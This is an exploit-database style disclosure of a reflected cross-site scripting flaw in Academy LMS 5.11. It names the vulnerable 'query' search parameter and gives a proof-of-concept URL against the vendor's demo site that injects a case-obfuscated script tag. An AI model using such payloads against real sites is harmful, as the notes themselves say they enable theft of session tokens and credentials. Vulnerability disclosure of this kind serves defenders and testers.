Academy LMS version 5.11 suffers from a cross site scripting vulnerability.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Exploits ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr :
β Website : creativeitem.com β
β Vendor : CreativeItem β
β Software : Academy LMS v 5.11 (Academy Learning Management System) β
β Vuln Type: Reflected XSS β
β Method : GET β
β Impact : Manipulate the content of the site β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β The attacker can send to victim a link containing a malicious URL in an email or β
β instant message can perform a wide variety of actions, such as stealing the victim's β
β session token or login credentials β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2023 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
URL parameter 'query' is vulnerable to XSS
Path: /academy/home/
https://demo.creativeitem.com/academy/home/search?query=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
[-] Done






